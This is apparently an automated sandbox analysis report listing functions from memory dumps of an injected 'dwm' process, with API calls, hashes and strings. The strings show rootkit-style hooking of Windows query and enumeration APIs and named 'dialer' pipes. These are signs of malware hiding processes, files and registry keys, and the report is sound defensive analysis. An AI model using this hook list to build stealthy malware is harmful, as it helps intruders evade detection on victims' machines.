Instruction ID: 70d226316510c94b8306b8a092c6df7aa55dfe51a91fff6a91d8beb7a0bd2133
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 00115E3A704B4192EB149B11F4A83A9A6B0F759FA4F040429DEA907795EF7DCA85C700

Function 0000021091923AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 0000021091923B46
VirtualAlloc.KERNEL32 ref: 0000021091923B80

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: fc5431c37c53ffe601c82a9af76216aad18faad9849fabe5f1ccacd872cac22f
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 0131F731319A4491EB74DE15E0A839AA2A4F39CBB4F500925F5DD46B9ADFBDCAC18B00

Function 0000021091923458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002109192347A
PathFindFileNameW.SHLWAPI ref: 0000021091923489

Part of subcall function 0000021091923930: StrCmpNIW.SHLWAPI ref: 0000021091923948

Part of subcall function 0000021091923878: GetModuleHandleW.KERNEL32 ref: 0000021091923886
Part of subcall function 0000021091923878: GetCurrentProcess.KERNEL32 ref: 00000210919238B4
Part of subcall function 0000021091923878: VirtualProtectEx.KERNEL32 ref: 00000210919238D6
Part of subcall function 0000021091923878: GetCurrentProcess.KERNEL32 ref: 00000210919238F4
Part of subcall function 0000021091923878: VirtualProtectEx.KERNEL32 ref: 0000021091923915

CreateThread.KERNEL32 ref: 00000210919234D7

Part of subcall function 0000021091921EB4: GetCurrentThread.KERNEL32 ref: 0000021091921EBF

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 06b3bc1866233eba6d86b78bc9baa32c7403131d69a2bfca2038f4b2fb65c32a
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 09116D74B14601A2FB219721B9EE3E92290BB78F35F5408259A3685197EFFDCEC58240

Function 0000021091924ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0000021091924ED4
VirtualProtect.KERNEL32 ref: 0000021091924F17
FlushInstructionCache.KERNEL32 ref: 0000021091924F2C

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction ID: 3a01ed9d2ac3962454ee7d3ee1bd9125181d1adc6a5cf8c48ce27de0a3baee6f
Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction Fuzzy Hash: 0FF03036318B44D0D631EB05E4A979AA7A0E3ECBF4F140511F99D07B6ACE78C9C18F00

Function 00000210918F2908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000210918F29AA
LoadLibraryA.KERNELBASE ref: 00000210918F2A31

Memory Dump Source

Source File: 00000020.00000002.2720012814.00000210918F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_210918f0000_dwm.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: c15ba3903186b7a8a03fa8c8f423f34469ab4fd7e5f93fbdcd8ea17f36ce8f9c
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 3F61013270165187EA68CF15D4A87AEB392FB24FA4F948121DE190B7C6DB78EC93D740

Function 0000021091921C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000021091921650: GetProcessHeap.KERNEL32 ref: 000002109192165B
Part of subcall function 0000021091921650: HeapAlloc.KERNEL32 ref: 000002109192166A
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 00000210919216DA
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 0000021091921707
Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 0000021091921721
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 0000021091921741
Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 000002109192175C
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 000002109192177C
Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 0000021091921797
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 00000210919217B7
Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 00000210919217D2
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 00000210919217F2

Sleep.KERNEL32 ref: 0000021091921C43
SleepEx.KERNELBASE ref: 0000021091921C49

Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 000002109192180D
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 000002109192182D
Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 0000021091921848
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 0000021091921868
Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 0000021091921883
Part of subcall function 0000021091921650: RegOpenKeyExW.ADVAPI32 ref: 00000210919218A3
Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 00000210919218BE
Part of subcall function 0000021091921650: RegCloseKey.ADVAPI32 ref: 00000210919218C8

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 9ac5f829f1f256ebb567b8dec5cb70a3703c23bbe252187392e5bc6c665338bd
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 5531FF75301605A1FF50AB26DAE93D91294AB64FE8F0458319E2B87697DEB0CCF0C250

Function 0000021091962908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000210919629AA

Memory Dump Source

Source File: 00000020.00000002.2720175538.0000021091960000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021091960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091960000_dwm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 6c2be8a09c2ff9b389f95445521786bdbc44b6bc2e30be55f05f18735f34d526
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: F661FE3270165187EA68CF2594A87ACB391FB64FE4F548121DA19077C6DAB8EC92C720

Non-executed Functions

Function 0000021091922CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000021091922D80
lstrlenW.KERNEL32 ref: 0000021091922FBA

Part of subcall function 0000021091921A14: OpenProcess.KERNEL32 ref: 0000021091921A3A
Part of subcall function 0000021091921A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000021091921A58
Part of subcall function 0000021091921A14: PathFindFileNameW.SHLWAPI ref: 0000021091921A67
Part of subcall function 0000021091921A14: lstrlenW.KERNEL32 ref: 0000021091921A73
Part of subcall function 0000021091921A14: StrCpyW.SHLWAPI ref: 0000021091921A86
Part of subcall function 0000021091921A14: CloseHandle.KERNEL32 ref: 0000021091921A94

GetProcAddress.KERNEL32 ref: 0000021091922D95

Part of subcall function 0000021091921554: StrCmpIW.SHLWAPI ref: 0000021091921585

Part of subcall function 0000021091923930: StrCmpNIW.SHLWAPI ref: 0000021091923948

StrCmpNIW.SHLWAPI ref: 0000021091922DD8
lstrlenW.KERNEL32 ref: 0000021091922F00

Strings

ntdll.dll, xrefs: 0000021091922D79
\Device\Nsi, xrefs: 0000021091922DCB
NtQueryObject, xrefs: 0000021091922D8B

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 5b192b5900dfcac0ab81b20b91d725bb3ba702f2c85c746ae9326931cad0ebf9
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 77B1E232310A50A2EB648F25D4A8BE973A4F768FB4F445816EE2953796DFB9CDC1C340

Function 0000021091927E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000021091927E8C
RtlCaptureContext.NTDLL ref: 0000021091927EB9
RtlLookupFunctionEntry.NTDLL ref: 0000021091927ED3
RtlVirtualUnwind.NTDLL ref: 0000021091927F14
IsDebuggerPresent.KERNEL32 ref: 0000021091927F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000021091927F89
UnhandledExceptionFilter.KERNEL32 ref: 0000021091927F94

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 6ef922c4efb692aa1288004081049a37c869c9198ecba922ce0c6765b602c00d
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: BB31C372304B8196EB60CF60E8A47ED33A0F7A4B54F44442ADB5D57B99EF78CA88C710

Function 000002109192B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002109192B585
RtlLookupFunctionEntry.NTDLL ref: 000002109192B59D
RtlVirtualUnwind.NTDLL ref: 000002109192B5D8
IsDebuggerPresent.KERNEL32 ref: 000002109192B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002109192B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002109192B626

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: f9e7d458bafc117f8ab181b1da37a7f43aa841b6bd585dc3010417254ee029f2
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 0631A836314F8096DB60CF25E8943DE73A4F798B64F500515EAAE47B55DF78C985CB00

Function 000002109192FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002109192FF67
WriteFile.KERNEL32 ref: 000002109193021E
WriteFile.KERNEL32 ref: 0000021091930270
GetLastError.KERNEL32 ref: 0000021091930372
GetLastError.KERNEL32 ref: 00000210919303D2

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: add144d003f97e134eabc70a27ff723757ccc9fadbb2b9ec465d542d7cc51d25
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 25E11532704B809AE700CF64D0E82DE7BB1F355BE8F184516DE6A57B9ADA78C997C700

Function 00000210919212C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000021091921326
GetProcessHeap.KERNEL32 ref: 0000021091921334
HeapAlloc.KERNEL32 ref: 0000021091921345
RegEnumValueW.ADVAPI32 ref: 00000210919213A1

Part of subcall function 0000021091921554: StrCmpIW.SHLWAPI ref: 0000021091921585

GetProcessHeap.KERNEL32 ref: 00000210919213E9
HeapAlloc.KERNEL32 ref: 00000210919213F7
GetProcessHeap.KERNEL32 ref: 000002109192141B
HeapFree.KERNEL32 ref: 0000021091921429
lstrlenW.KERNEL32 ref: 0000021091921432
GetProcessHeap.KERNEL32 ref: 0000021091921440
HeapAlloc.KERNEL32 ref: 000002109192144E
StrCpyW.SHLWAPI ref: 0000021091921470
GetProcessHeap.KERNEL32 ref: 0000021091921485
HeapFree.KERNEL32 ref: 0000021091921493

Strings

d, xrefs: 0000021091921365

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: c8728d66b4db3e80c4892c75c1b1b66b4bee0d3efdf5be5868ec328271feb8a8
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 6C518F72344B4593EB14CFA2E59839AB3B1F798F94F048124DA6A07B15DFBCC9A6C740

Function 0000021091921EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000021091921EBF

Part of subcall function 0000021091922174: GetModuleHandleA.KERNEL32 ref: 000002109192218C
Part of subcall function 0000021091922174: GetProcAddress.KERNEL32 ref: 000002109192219D

Part of subcall function 0000021091925C10: GetCurrentThreadId.KERNEL32 ref: 0000021091925C4B

Strings

NtEnumerateValueKey, xrefs: 0000021091921F76
EnumServiceGroupW, xrefs: 0000021091921F90
NtQueryDirectoryFileEx, xrefs: 0000021091921F3C
ntdll.dll, xrefs: 0000021091921ECD
EnumServicesStatusExW, xrefs: 0000021091921FB1, 0000021091921FD2
NtQuerySystemInformation, xrefs: 0000021091921EE5
NtEnumerateKey, xrefs: 0000021091921F59
NtDeviceIoControlFile, xrefs: 0000021091921FF6
NtQueryDirectoryFile, xrefs: 0000021091921F1F
sechost.dll, xrefs: 0000021091921FD9
NtResumeThread, xrefs: 0000021091921F02
advapi32.dll, xrefs: 0000021091921F97, 0000021091921FB8

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 03086eb9a0c2fd79c9fd5bf0a7eefb0416e30e837678019c5e6c037c17e50612
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: DD31B379B0094AB0FA04EF65E9FA7D42321B774F64F8148139439521639EF98ECBC380

Function 00000210919223F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000021091922405
GetCurrentProcessId.KERNEL32 ref: 000002109192240F

Part of subcall function 00000210919219AC: OpenProcess.KERNEL32 ref: 00000210919219CA
Part of subcall function 00000210919219AC: IsWow64Process.KERNEL32 ref: 00000210919219E0
Part of subcall function 00000210919219AC: CloseHandle.KERNEL32 ref: 00000210919219FB

CreateFileW.KERNEL32 ref: 0000021091922468
WriteFile.KERNEL32 ref: 0000021091922490
ReadFile.KERNEL32 ref: 00000210919224AF
CloseHandle.KERNEL32 ref: 00000210919224B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002109192243F
\\.\pipe\dialerchildproc64, xrefs: 0000021091922438

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: a3161c93c47f508108f187d8f84bed1f5c518ef2e2b3aa3c989d4f799cf1de44
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 5E21413671474193FB10CB25F59839AB3A1F399FB5F504215DA6942BA9CFBCC98ACB00

Function 000002109192104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000210919210AB
RegEnumValueW.ADVAPI32 ref: 000002109192110E
GetProcessHeap.KERNEL32 ref: 0000021091921155
HeapAlloc.KERNEL32 ref: 0000021091921163
GetProcessHeap.KERNEL32 ref: 0000021091921187
HeapFree.KERNEL32 ref: 0000021091921195

Strings

d, xrefs: 00000210919210CE

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: c0845711adcdaddf13d1be45f44c815ca1c39054069d6cebe0b018d7280dd106
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: A941B233304B8097EB608F52E4983DAB7A0F399B98F008125DB9907B55DF78C9A5CB00

Function 00000210918F69F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000210918F6A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000210918F6A6A
_RTC_Initialize.LIBCMT ref: 00000210918F6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000210918F6ABE
__scrt_release_startup_lock.LIBCMT ref: 00000210918F6AE9

Memory Dump Source

Source File: 00000020.00000002.2720012814.00000210918F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_210918f0000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 0ae34038d109c67f8abeeab051c6a92e01c1e2dca8ceefbdf030f840dd8913c3
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 0E81E6B1B0024546FA509B2694F93DB23D0FB75FA0FA44225AA454B797DBF8CCC7A780

Function 00000210919275F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000021091927618
__scrt_acquire_startup_lock.LIBCMT ref: 000002109192766A
_RTC_Initialize.LIBCMT ref: 0000021091927698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000210919276BE
__scrt_release_startup_lock.LIBCMT ref: 00000210919276E9

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 5aa6e9e408c7a165f64ee44cfae722e102f30e0410b44c336c58ba4a11610f0a
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 97810430700241A6FB68AB2598FD3E922D4AB75FB0F444C159A34A7793DBF8CDC28711

Function 00000210919669F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000021091966A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000021091966A6A
_RTC_Initialize.LIBCMT ref: 0000021091966A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000021091966ABE
__scrt_release_startup_lock.LIBCMT ref: 0000021091966AE9

Memory Dump Source

Source File: 00000020.00000002.2720175538.0000021091960000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021091960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091960000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 94b1ac44b06db9f62eb9bd2a05e3709ed5eb32c239dba5b4b9d69906c7951655
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 7181E531B2464186FB649B2A98F93D966D0EBB5FE0F848025AA05437D7DBF9CCC58720

Function 0000021091929804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000021091929889
GetLastError.KERNEL32 ref: 0000021091929897
LoadLibraryExW.KERNEL32 ref: 00000210919298C1
FreeLibrary.KERNEL32 ref: 0000021091929907
GetProcAddress.KERNEL32 ref: 0000021091929913

Strings

api-ms-, xrefs: 00000210919298A9

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: b7ddbff0a537f00e81bc162860f5b988b9bbc2478859636d923cbce95f72257d
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 9431C435312661A1FE159B1AA4A87D96394BB28FB0F190924ED7D4B382DFB8C9C5C300

Function 0000021091931B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000021091931BCD
GetLastError.KERNEL32 ref: 0000021091931BD9
CloseHandle.KERNEL32 ref: 0000021091931BF1
CreateFileW.KERNEL32 ref: 0000021091931C1C
WriteConsoleW.KERNEL32 ref: 0000021091931C3B

Strings

CONOUT$, xrefs: 0000021091931BFD

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: a20211a613736ffdf02cb32b94ef96f4879b9c958ec628a0d0a189021776d273
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 7E11C431714B4086E7508B46E8A8359B3B0F3A8FF4F404224EA6E877A5CFBCCD958740

Function 00000210919230B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000210919230D7
HeapAlloc.KERNEL32 ref: 00000210919230EA
StrCmpNIW.SHLWAPI ref: 000002109192316B
GetProcessHeap.KERNEL32 ref: 00000210919231D1
HeapFree.KERNEL32 ref: 00000210919231DF

Strings

dialer, xrefs: 0000021091923164

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 3e844268d888ea32e459176e9c073a7d5fe7971bc372bb98e78af103dd484425
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: C7319631701B55A2EB15DF56A8982A963B0FB68FB4F1449209E5807B57EF78CDE2C700

Function 0000021091921A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000021091921A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000021091921A58
PathFindFileNameW.SHLWAPI ref: 0000021091921A67
lstrlenW.KERNEL32 ref: 0000021091921A73
